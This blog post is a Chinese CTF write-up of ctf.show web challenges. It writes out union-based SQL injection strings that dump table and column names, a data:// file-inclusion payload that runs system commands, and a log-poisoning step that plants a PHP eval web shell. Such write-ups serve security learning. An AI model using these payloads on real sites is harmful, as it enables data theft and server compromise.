首页 > 其他分享 >test1_1_1

test1_1_1

时间:2024-07-17 21:58:40浏览次数:13  
标签:test1 回显 admin flag SQL select 注入

web签到题

题目

web签到题

分析

F12 打开 html 文件:

将注释进行 Base64 解码得到 flag。

web2

题目

最简单的SQL注入

分析

看着应该是 SQL 注入题。


先尝试使用 admin 和 123456 登录,发现没有任何回显。看来报错被屏蔽了。


显然 admin 栏如果注入成功则属于字符型注入。尝试使用万能密码作为用户名登录并把后面的密码语句注释掉,填入 admin' or 1=1 #,密码随便填,得到登录成功的回显:


之后通过 “order by+数字” 猜测表的字段数,当猜测的数字小于或等于实际字段数,回显正确,否则报错。向用户名填入 admin' or 1=1 order by 10# 发现无任何回显,说明报错了。依次使用 9、8、7…… 替换上述命令中的 10,当尝试到 3 的时候出现回显,说明该表的字段数为 3:


在获得字段数之后,我们需要测试哪个字段在网站上能够得到回显。这里使用联合查询 union select 语句,向用户名传入 admin' or 1=1 union select 1,2,3#,得到的回显中只有 2,即只有第 2 个字段能够产生回显:


于是我们向第 2 个字段位置输入 database() 以获得当前数据库名,向用户名传入 admin' or 1=1 union select 1,database(),3#,得到数据库名为 web2:


通过 (select group_concat(table_name) from information_schema.tables where table_schema='xxx') 查询数据库 web2 的表名并将所有表名写入一行输出。其中 group_concat() 将所有内容写入一行并输出;information_schema 是 mysql 自带的库,记录了该数据库所有的表名和字段名。向用户名传入 admin' or 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#,得到 web2 的表名 flag 和 user:


通过 (select group_concat(column_name) from information_schema.columns where table_name='xxx') 查询 web2 数据库 flag 表中的字段名并将所有字段名写入一行输出。向用户名传入 admin' or 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3#,得到字段名 flag:


最后查询 flag 字段的值。向用户名传入 admin' or 1=1 union select 1,(select flag from flag),3#,得到 flag。

参考

ctf.show web2 最简单的SQL注入-0d@y-CSDN
sql回显注入(满满的干货)-iwhattt-博客园
sql注入之万能密码总结-無名之涟-CSDN
SQL注入 (初级篇) 数字形注入与字符型注入区别-笑傲code-CSDN
SQL 注入之 UNION 查询(回显)-z_hunter-CSDN
浅谈SQL注入中的-1‘ union select 1,2,3#-娄不夜-CSDN
SQL注入:union注入学习笔记整理-冇得理想-CSDN
SQL注入如何判断数据库类型-2021!-CSDN
SQL注入常用命令-浅笑996-博客园
史上最全SQL基础知识总结(理论+举例)-Yvonne.Y-CSDN

web3

题目

更简单的web题

分析

代码出现 include,猜测是文件包含漏洞。


通过 data:// 数据流 + php 命令执行函数查询当前工作目录下的内容,使用 hackbar 需要先进行 url 编码:


得到 flag 文件名和首页文件:


?url=data://text/plain,%3C%3Fphp%0Asystem('cat ctf_go_go_go')%3B%0A%3F%3E 打开 flag 文件,得到 flag 内容。

参考

Web_XCTF_WriteUp | Web_php_include-Guanz-博客园

web4

题目

分析

和上一题显示的页面一样,用同样的方法尝试注入:


出现报错:

看来这题相比上一题增加了过滤。


使用 shell_exec 同理:


换个思路,尝试使用一句话木马连接服务器后台。


根据发回的响应包可以确定这题使用的是 nginx 服务器:


看看访问日志先,?url=/var/log/nginx/access.log


尝试使用日志包含写入一句话木马,往 User-Agent 字段传入一句话木马 <?php @eval($_POST['web4']);?>


传入后的日志增加一条记录:


使用中国蚁剑连接日志文件,在 /var/www/flag.txt 目录找到 flag 内容。

参考

ctfshow_WriteUp | _萌新-Guanz-博客园

标签:test1,回显,admin,flag,SQL,select,注入
From: https://www.cnblogs.com/Guanz/p/18308378

相关文章

  • test111_2
    web3题目更简单的web题分析代码出现include,猜测是文件包含漏洞。通过data://数据流+php命令执行函数查询当前工作目录下的内容,使用hackbar需要先进行url编码:得到flag文件名和首页文件:?url=data://text/plain,%3C%3Fphp%0Asystem('catctf_go_go_go')%3B%......
  • test111_1
    web签到题题目web签到题分析F12打开html文件:将注释进行Base64解码得到flag。web2题目最简单的SQL注入分析看着应该是SQL注入题。先尝试使用admin和123456登录,发现没有任何回显。看来报错被屏蔽了。显然admin栏如果注入成功则属于字符型注入。尝试......
  • pythontest1
    importitertoolsdefpermutations_combinations(n,m,letters):#排列序列permutations=list(itertools.permutations(letters,m))permutation_output=[''.join(permutation)forpermutationinpermutations]#组合序列,按字母升序排列combination......
  • Numerical Results of Test1
     ......
  • test1227
    冒泡排序题意:给定\(a_1,a_2,...,a_n\)和\(m\)个三元组\((l_i,r_i,s_i)\)。每个三元组对应如下函数,修改\(\{a_n\}\)中的元素并返回一个布尔值。defbubble(l,r,s):foriinrange(s,n+1):#s<=i<=nifl>a[i]:l,a[i]=a[i],lret......
  • test1211
    别急。先更一波T2,T3。七管荧光灯可以状压打表可以发现:一种局面为必败状态当且仅当满足\(a_{1}=x,a_{2}=x,a_{3}=x,a_{4}=y,a_{5}={z},a_{6}=z,a_{7}=z\)且\(x\oplusy\oplusz=0\)。然后就可以数位dp了,记个\(f_{i,0/1,0/1,0/1,0/1,0/1,0/1}\)。随便跑跑就行。字符串......
  • C:\Users\17482\Desktop\ERP——test1\SpringBoot-ERP-master\src\main\java
    这个错误表明在你的Java类文件UserImp.java中,找不到MyBatis的注解包org.apache.ibatis.annotations。这个包中包含了MyBatis的注解,比如@Select、@Insert等。首先,请确保你的项目正确引入了MyBatis的依赖。在你的pom.xml文件中应该包含类似以下的依赖配置:<dependency......
  • C:\Users\17482\Desktop\ERP——test1\SpringBoot-ERP-master\src\main\java
    这个错误表明在你的Java类文件UserImp.java中,找不到MyBatis的注解包org.apache.ibatis.annotations。这个包中包含了MyBatis的注解,比如@Select、@Insert等。首先,请确保你的项目正确引入了MyBatis的依赖。在你的pom.xml文件中应该包含类似以下的依赖配置:<dependency......
  • test1111
    [root@localhostharbor]#cat/etc/docker/daemon.json{"registry-mirrors":["http://f1361db2.m.daocloud.io"],"insecure-registries":["192.168.56.146"] #<<=加入harbor的地址} ......
  • 联考test1009
    写在前面的话感觉比以往的比赛难多了。出题人卡高精度,不好评价,但是题目还是好题。考试的时候开题顺序为\(T1-T3-T4-T2\),感觉和题目的实际难度排序差不多。考试的时候懒了,没有去拼暴力,实际得分\(80+0+100+0=180\),总体排名\(rk29\)。\(T1\)题意简述我们知道,对于一个整......